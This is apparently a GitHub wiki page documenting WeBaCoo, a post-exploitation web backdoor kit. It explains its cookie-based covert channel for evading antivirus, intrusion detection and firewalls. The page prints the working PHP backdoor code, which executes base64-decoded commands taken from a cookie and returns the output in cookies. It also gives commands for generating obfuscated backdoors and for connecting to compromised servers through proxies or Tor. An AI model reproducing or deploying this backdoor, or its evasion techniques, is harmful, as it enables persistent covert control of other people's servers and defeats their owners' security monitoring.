Skip to content

Documentation

Jump to bottom
anestisb edited this page Dec 19, 2011 · 8 revisions

Introduction

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server.

WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute commands to the compromised server. The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses.

The script-kit has two main operation modes: Generation and "Terminal". Using generation mode, user can create the backdoor code containing the PHP payloads. On the other hand, at the remote "terminal" mode the client can connect to the compromised server where the backdoor PHP code has been injected. In order to establish the remote "pseudo"-shell, the user must provide the server's URL path containing the injected code.

Communication

The following image describes in detail the way client and server communicate under WeBaCoo. Webacoo Connection Schema

What needs to be emphasized here is that every interaction between server and client is reached under the HTTP header's cookie field. Unlike other similar tools, WeBaCoo does not use the HTML data field to send the command output to client. Instead it uses a buffering mechanism to capture the output and send it encoded to client using HTTP cookies.

PHP Backdoor Code

The design concept behind the backdoor PHP code is to provide a stealth way to send commands' output back to client. This is achieved using PHP's output buffering feature to buffer the output of the executed commands before sending them to the client. To execute system commands, variants of PHP's system functions are used in WeBaCoo generation mode.

As seen in the communication paragraph, a single client request includes 3 crucial values under the HTTP cookie field:

  1. "cm": base64 encoded shell command
  2. "cn": the new cookie name that the server will use to send the encoded output
  3. "cp": the delimiter used to wrap the encoded output

If fixed delimiter is not defined by the user, a new random one is generated at each request. It is strongly advised to choose the random feature for better stealth behavior.

To clarify the backdoor code usage, a raw code output (using -r flag) was taken, beautified and presented with the relevant comments as follow:

#Check if "cm" cookie used in the page request
if(isset($_COOKIE['cm'])){

    #Start output buffering
    ob_start();

    #Decode and execute the cmd passed from "cm" cookie
    system(base64_decode($_COOKIE['cm']).' 2>&1');

    #Get output_buffer's content -> 
    #encode it ->
    #include head & tail delimiter -> 
    #set the Cookie named from the "cp" value
    setcookie($_COOKIE['cn'],$_COOKIE['cp'].base64_encode(ob_get_contents()).$_COOKIE['cp']);

    #Erase output buffer and stop buffering
    ob_end_clean();
}

**ps**: Base64 decoder's function name is retrieved through string manipulation tricks for stealth reasons (refer to Appendix for more info). Although, the code analysis has been intentionally left to its initial form for better backdoor source code readability.

Usage examples

Generation mode (-g)

  • Generate obfuscated backdoor code in the "my_backdoor.php" file using the default settings
    webacoo.pl -g -o my_backdoor.php
  • Generate obfuscated backdoor code in the "my_backdoor2.php" file using the "exec" payload (#3). The detailed list of the available functions can be obtained from the help (-h) page or the README file.
    webacoo.pl -g -o my_backdoor2.php -f 3
  • Generate the raw backdoor code in "raw_backdoor.php" file using the "popen" payload (#5).
    webacoo.pl -g -o my_backdoor2.php -f 5 -r

"Terminal" mode (-t)

  • Connect to the server by accessing the -u web_path with the default settings
    webacoo.pl -t -u http://10.0.1.11/backdoor.php
  • Connect to the server by accessing the -u web_path using "Test-Cookie" as cookie name and "TtT" as delimiter
    webacoo.pl -t -u http://10.0.1.11/backdoor.php -c "Test-Cookie" -d "TtT"
  • Connect to the server through a HTTP proxy by accessing the -u web_path using "Test-Cookie2" as cookie name and "TtTt" as delimiter
    webacoo.pl -t -u http://10.0.1.11/backdoor.php -c "Test-Cookie2" -d "TtTt" -p 10.0.1.4:8080
  • Connect to the server using Tor network by accessing the -u web_path using "My-Cookie" as cookie name
    webacoo.pl -t -u http://example.com/backdoor.php -c "My-Cookie" -p tor

Appendix

  • For new string manipulation techniques to bypass base64 decoder detection refer to relevant blog post.
  • Detail analysis about the techniques used to bypass statistical malware analysis methods here.
  • Additional material and detailed usage examples about WeBaCoo can be found at developer's blog.


Latest WeBaCoo version: 0.2
Last update at December 19 2011

Clone this wiki locally